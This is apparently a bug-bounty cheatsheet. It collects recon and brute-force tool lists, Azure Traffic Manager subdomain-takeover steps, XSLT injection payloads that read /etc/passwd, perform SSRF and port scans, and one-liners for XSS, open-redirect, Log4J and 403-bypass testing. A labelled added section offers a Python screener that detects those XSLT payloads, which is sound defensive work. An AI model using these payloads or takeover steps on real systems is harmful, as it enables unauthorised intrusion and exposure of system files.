🚨Tools collection🚨
Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source codes
5. knockpy
6. subfinder
7. aquatone
8. SubDomainizer
9. altdns
10. SecurityTrails API
Bruteforcing tools we can use!
1. Go-buster
2. dirsearch
3. ssb - ssh brute
4. Callow - custom tool for login forms
5. Ncrack - network services
Spidering tools we can use!
1. Spider in Burp
2. Paramspider
3. Scrapy
4. Go_spider
5. aspider
6. ParamPAMPAM
Dir Enum tools we can use!
1. Dirb
2. Gobuster
3. Dirsearch
Wordlists we can use!
1. seclists
2. Assetnote
How to find Broken Authentication in 30 seconds or less using Autorize
👉 Set up Autorize in Burp
1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column
🌟Load Balancer Takeover🌟
Step 1: Identify .trafficmanager.net subdomains. 🕵️♂️
Step 2: Use your Azure subscription to access the Traffic Manager profile. 🌐
Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. 🛠️
Step 4: Add an endpoint for redirection to your desired site. 🔄
🌟XSLT Server Side Injection🌟
(Extensible Stylesheet Language Transformations) - Part 1
The most widely used implementations are libxslt (GNOME), Xalan (Apache) and Saxon (Saxonica).
1. Read Local File: read.xsl (unparsed-text() is an XSLT 2.0 function, so this needs a 2.0-capable processor such as Saxon)
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
2. SSRF
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl">
</esi:include>
3. JavaScript Injection
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<xsl:value-of select="document('http://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
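As an added example (not from the post), a stdlib-only Python pre-filter that a service accepting user-supplied stylesheets can run before handing them to libxslt, Xalan or Saxon: it flags the primitives the four payloads above rely on (unparsed-text() and document() in XPath, an xsl:include/xsl:import with a URI scheme, a literal or dynamically built script element) plus the php.net/xsl extension namespace binding. The two sample stylesheets are constructed for the example; screening is only a logging/rejection layer, the real control is the processor's own restriction of document(), includes and extension functions (lxml exposes this as XSLTAccessControl).

```python
import io
import re
import xml.etree.ElementTree as ET

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
RISKY_NAMESPACES = {"http://php.net/xsl"}          # extension namespaces exposing host functions
RISKY_FUNCTIONS = re.compile(r"\b(document|unparsed-text)\s*\(")  # file/network reads from XPath
HAS_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)           # http:, file:, ftp: ... in an href


def screen_xslt(xslt_text):
    """Return a list of findings for one stylesheet ([] = nothing risky spotted).
    Malformed XML raises ET.ParseError; callers should treat that as a rejection too."""
    findings = []
    source = io.BytesIO(xslt_text.encode("utf-8"))
    for event, payload in ET.iterparse(source, events=("start-ns", "start")):
        if event == "start-ns":                       # xmlns declarations arrive before the element
            prefix, uri = payload
            if uri in RISKY_NAMESPACES:
                findings.append(f"extension namespace bound: xmlns:{prefix}={uri}")
            continue
        elem = payload
        ns, _, local = elem.tag.rpartition("}")       # ElementTree tags look like {uri}local
        ns = ns.lstrip("{")
        if ns == XSLT_NS and local in ("include", "import"):
            href = elem.get("href", "")
            if HAS_SCHEME.match(href):                # any URI scheme leaves the sandbox
                findings.append(f"xsl:{local} fetches an external stylesheet: {href}")
        elif ns == XSLT_NS and local == "element" and elem.get("name", "").lower() == "script":
            findings.append("xsl:element builds a <script> element at runtime")
        elif ns != XSLT_NS and local.lower() == "script":
            findings.append("literal <script> element would be copied into the output")
        for attr in ("select", "test"):               # XPath expressions live in these attributes
            value = elem.get(attr, "")
            if RISKY_FUNCTIONS.search(value):
                findings.append(f'{attr}="{value}" calls document()/unparsed-text()')
    return findings

# Constructed samples: the "read local file" payload from the post and a harmless stylesheet.
READ_FILE_XSL = (
    '<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
    'xmlns:abc="http://php.net/xsl" version="1.0"><xsl:template match="/">'
    "<xsl:value-of select=\"unparsed-text('/etc/passwd', 'utf-8')\"/>"
    "</xsl:template></xsl:stylesheet>"
)
BENIGN_XSL = (
    '<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">'
    '<xsl:template match="/"><html><body><xsl:value-of select="/news/title"/>'
    "</body></html></xsl:template></xsl:stylesheet>"
)
```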
🌟Find JS Endpoints With 1-Click🌟
1. Add a blank bookmark in your browser.
2. Put this regex (https://0-a.nl/jsendpoints.txt) in the URL field.
3. Now open any site and click your bookmark!
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
XSS Checks Made Easy 🌐
Example: Execute XSS checks on a list of URLs with a single command.
One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt
Uncover Hidden Parameters in Seconds 🕵️♂️
Example: Extract hidden parameters from URLs effortlessly.
One-Liner:
cat alive.txt | rush 'curl -skL "{}" | grep "type=\"hidden\"" | grep -Eo "name=\"[^\"]+\"" | cut -d"\"" -f2 | sort -u' | anew params.txt
Reveal Secrets in JavaScript Files 🕵️♂️
Example: Identify sensitive data in JavaScript files like a pro.
One-Liner:
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
Crush Directories with Effortless Bruteforce 🔍
Example: Discover hidden directories and files effortlessly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
Expose Log4J Vulnerabilities with Ease 🔍
Example: Identify Log4J vulnerabilities on the fly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @'
Hunt Down Sneaky Open Redirect🎯
Example: Uncover open redirects like a seasoned hunter.
One-Liner:
gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Capture Screenshots in a Snap 📷
Example: Capture screenshots of live websites effortlessly.
One-Liner:
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
Know Your WordPress Version 📝
Example: Discover the WordPress version of a target website instantly.
One-Liner:
curl -s 'https://target.com/readme.html' | grep 'Version'
Unearth Subdomains Containing JavaScript 🌐
Example: Find subdomains with JavaScript files in a snap.
One-Liner:
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
Bypass 403 Login Pages with Finesse 🚪
Example: Bypass 403 login pages like a pro.
One-Liner:
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
🌟Fuzzing and Bypassing the AWS WAF to trigger XSS🌟
👉Tool - https://lnkd.in/gk4-_4yw
👉Blog - https://lnkd.in/g4W7eA7R
Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authentication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
OAuth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
🌟Find Waybackurls JS Endpoints With 1-Click🌟
1. Add a blank bookmark in your browser.
2. Put this bookmarklet in the URL field:
javascript:(function() { var currentURL = encodeURIComponent(window.location.hostname.replace(/^www\./, '')); var newURL = 'https://web.archive.org/cdx/search/cdx?url=' + currentURL; window.open(newURL, '_blank');})();
3. Now open any site and click your bookmark!